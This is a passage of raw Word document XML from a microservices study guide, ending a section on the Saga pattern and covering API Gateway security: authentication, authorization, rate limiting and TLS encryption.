          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: In orchestration-based sagas, design a centralized service that tracks the saga execution, manages state transitions, and invokes compensating transactions.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EE97269"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Saga State Management</w:t>
      </w:r>
      <w:r w:rsidRPr="008B3EF9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Maintain state to track the saga's progress and handle compensations for failed steps.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CD7169E" w14:textId="77777777" w:rsidR="00D056EB"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281DCA4">
          <v:rect id="_x0000_i2820" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="328B513D"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Summary:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25B86096"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The </w:t>
      </w:r>
      <w:r w:rsidRPr="008B3EF9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Saga Pattern</w:t>
      </w:r>
      <w:r w:rsidRPr="008B3EF9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> is essential for managing distributed transactions in a microservices environment, ensuring that the system remains consistent even when services fail. You can implement it using two approaches: </w:t>
      </w:r>
      <w:r w:rsidRPr="008B3EF9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Choreography</w:t>
      </w:r>
      <w:r w:rsidRPr="008B3EF9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (where services communicate via events) or </w:t>
      </w:r>
      <w:r w:rsidRPr="008B3EF9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Orchestration</w:t>
      </w:r>
      <w:r w:rsidRPr="008B3EF9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (where a central service coordinates the saga steps). While sagas add complexity, they offer a solution to maintain consistency in highly distributed systems.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="740AFF8C" w14:textId="05BF2961" w:rsidR="00115965" w:rsidRPr="00CE4B95" w:rsidRDefault="00000000" w:rsidP="0011596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085529D">
          <v:rect id="_x0000_i2821" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="61DBB028" w14:textId="094D0983" w:rsidR="00615C7B" w:rsidRPr="00CE4B95" w:rsidRDefault="00E06CFA">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="682" w:name="_Toc196308162"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>How to handle security in an API Gateway</w:t>
      </w:r>
      <w:r w:rsidR="00615C7B" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="682"/>
    </w:p>
    <w:p w14:paraId="17916865" w14:textId="6F144FED" w:rsidR="00D056EB" w:rsidRPr="008B3EF9" w:rsidRDefault="00D056EB" w:rsidP="008B3EF9">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:num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Handling Security in an API Gateway</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="405EB9E4"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An </w:t>
      </w:r>
      <w:r w:rsidRPr="008B3EF9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>API Gateway</w:t>
      </w:r>
      <w:r w:rsidRPr="008B3EF9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> acts as an entry point for all client requests in a microservices architecture. It provides features like load balancing, request routing, authentication, authorization, rate limiting, and more. When it comes to </w:t>
      </w:r>
      <w:r w:rsidRPr="008B3EF9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>security</w:t>
      </w:r>
      <w:r w:rsidRPr="008B3EF9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>, the API Gateway plays a critical role in securing the entire ecosystem of microservices by enforcing security policies at the gateway level before forwarding requests to the individual microservices.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D0E3972"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Here are the key ways to handle security in an </w:t>
      </w:r>
      <w:r w:rsidRPr="008B3EF9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>API Gateway</w:t>
      </w:r>
      <w:r w:rsidRPr="008B3EF9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75BE872E" w14:textId="77777777" w:rsidR="00D056EB"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CF9D86">
          <v:rect id="_x0000_i2822" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="2954D577"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1. Authentication</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="368E037C"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Authentication ensures that users or services are who they claim to be.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="012869F1"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OAuth 2.0 and OpenID Connect (OIDC)</w:t>
      </w:r>
      <w:r w:rsidRPr="008B3EF9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0674F761"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Use an external Identity Provider (IdP) like </w:t>
      </w:r>
      <w:r w:rsidRPr="008B3EF9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Auth0</w:t>
      </w:r>
      <w:r w:rsidRPr="008B3EF9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidRPr="008B3EF9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Okta</w:t>
      </w:r>
      <w:r w:rsidRPr="008B3EF9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, or </w:t>
      </w:r>
      <w:r w:rsidRPr="008B3EF9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Keycloak</w:t>
      </w:r>
      <w:r w:rsidRPr="008B3EF9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> to authenticate users. The API Gateway verifies the JWT (JSON Web Token) sent with the request to validate the identity.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5042F9E3"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The API Gateway can extract the token from the HTTP header, validate it, and forward the request to the respective microservice if the token is valid.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="347960E6"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In cases where the token is missing or invalid, the API Gateway can reject the request with a </w:t>
      </w:r>
      <w:r w:rsidRPr="008B3EF9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>401 Unauthorized</w:t>
      </w:r>
      <w:r w:rsidRPr="008B3EF9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> response.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F873391"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API Key Authentication</w:t>
      </w:r>
      <w:r w:rsidRPr="008B3EF9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70D21D9C"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Use API keys for service-to-service communication or client-to-gateway communication.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47C6E501"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The API Gateway checks if the API key is valid and authorized to access specific endpoints or services.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="344C309B"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Basic Authentication</w:t>
      </w:r>
      <w:r w:rsidRPr="008B3EF9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69F16A98"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For simple use cases, the gateway can handle basic authentication by checking the Authorization header (which contains the base64-encoded username and password) against a list of credentials.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D934393"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Session-Based Authentication</w:t>
      </w:r>
      <w:r w:rsidRPr="008B3EF9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45944FFE"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If using session-based authentication (like in web applications), the API Gateway can verify the session by checking the session ID stored in cookies or headers.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65CDAB32" w14:textId="77777777" w:rsidR="00D056EB"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FDAF798">
          <v:rect id="_x0000_i2823" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E2D9AE5"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2. Authorization</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="569C1516"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Authorization is the process of ensuring that the authenticated user has the proper permissions to access specific resources.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CE1DB4A"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Role-Based Access Control (RBAC)</w:t>
      </w:r>
      <w:r w:rsidRPr="008B3EF9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FA667BF"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Use </w:t>
      </w:r>
      <w:r w:rsidRPr="008B3EF9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>roles</w:t>
      </w:r>
      <w:r w:rsidRPr="008B3EF9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> to determine which actions a user or service can perform. For example, a user with the role "ADMIN" can access all resources, while a user with the role "USER" can only access a subset.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DE6D743"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The API Gateway can handle the checking of roles and permissions for each request and deny unauthorized access (e.g., returning a </w:t>
      </w:r>
      <w:r w:rsidRPr="008B3EF9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>403 Forbidden</w:t>
      </w:r>
      <w:r w:rsidRPr="008B3EF9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> response).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BDD0D1D"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Attribute-Based Access Control (ABAC)</w:t>
      </w:r>
      <w:r w:rsidRPr="008B3EF9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A4D0166"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For more fine-grained authorization, you can implement </w:t>
      </w:r>
      <w:r w:rsidRPr="008B3EF9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>ABAC</w:t>
      </w:r>
      <w:r w:rsidRPr="008B3EF9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> where access control decisions are based on attributes like user role, location, or time.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="773BAD86"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JWT Claims</w:t>
      </w:r>
      <w:r w:rsidRPr="008B3EF9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="477CD71B"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The API Gateway can extract roles or permissions from the </w:t>
      </w:r>
      <w:r w:rsidRPr="008B3EF9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>JWT claims</w:t>
      </w:r>
      <w:r w:rsidRPr="008B3EF9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (which might include user roles, access rights, etc.) and enforce these permissions on API calls.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B54F02A" w14:textId="77777777" w:rsidR="00D056EB"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E595ADC">
          <v:rect id="_x0000_i2824" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="248E4E6E"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3. Rate Limiting and Throttling</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02639D45"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To prevent abuse and ensure fair usage, it's important to </w:t>
      </w:r>
      <w:r w:rsidRPr="008B3EF9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>limit the number of requests</w:t>
      </w:r>
      <w:r w:rsidRPr="008B3EF9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> that can be made by a client in a given period.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4295023C"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API Gateway Rate Limiting</w:t>
      </w:r>
      <w:r w:rsidRPr="008B3EF9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69838B0B"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The API Gateway can enforce rate limiting by limiting the number of requests from a client (based on </w:t>
      </w:r>
      <w:r w:rsidRPr="008B3EF9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>IP</w:t>
      </w:r>
      <w:r w:rsidRPr="008B3EF9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidRPr="008B3EF9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>API Key</w:t>
      </w:r>
      <w:r w:rsidRPr="008B3EF9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidRPr="008B3EF9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>User</w:t>
      </w:r>
      <w:r w:rsidRPr="008B3EF9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>, etc.) within a specified time window (e.g., 1000 requests per hour).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="767A0E44"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This prevents </w:t>
      </w:r>
      <w:r w:rsidRPr="008B3EF9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Denial of Service (DoS)</w:t>
      </w:r>
      <w:r w:rsidRPr="008B3EF9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> attacks or abuse and ensures that one client doesn’t consume too many resources.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43824EC6"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Throttling</w:t>
      </w:r>
      <w:r w:rsidRPr="008B3EF9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7914D65F"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If a client exceeds the rate limit, the API Gateway can throttle the requests by returning </w:t>
      </w:r>
      <w:r w:rsidRPr="008B3EF9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>429 Too Many Requests</w:t>
      </w:r>
      <w:r w:rsidRPr="008B3EF9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> status codes until the client is allowed to send requests again.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F70EF8D" w14:textId="77777777" w:rsidR="00D056EB"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4FF7F30">
          <v:rect id="_x0000_i2825" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AA2C393"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4. TLS/SSL Encryption</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71359F96"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Ensure that data transmitted between the client and the API Gateway is encrypted using </w:t>
      </w:r>
      <w:r w:rsidRPr="008B3EF9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>TLS (Transport Layer Security)</w:t>
      </w:r>
      <w:r w:rsidRPr="008B3EF9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> or </w:t>
      </w:r>
      <w:r w:rsidRPr="008B3EF9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>SSL (Secure Sockets Layer)</w:t>
      </w:r>
      <w:r w:rsidRPr="008B3EF9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31383EBF"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HTTPS</w:t>
      </w:r>
      <w:r w:rsidRPr="008B3EF9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55CBE599"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Use HTTPS (secured via SSL/TLS certificates) to encrypt requests between the client and the API Gateway.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A3411FA"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All traffic must be encrypted to protect sensitive data from being exposed during transit (e.g., passwords, tokens).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AA24CCF"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lastRenderedPageBreak/>
        <w:t>End-to-End Encryption</w:t>
      </w:r>
      <w:r w:rsidRPr="008B3EF9">
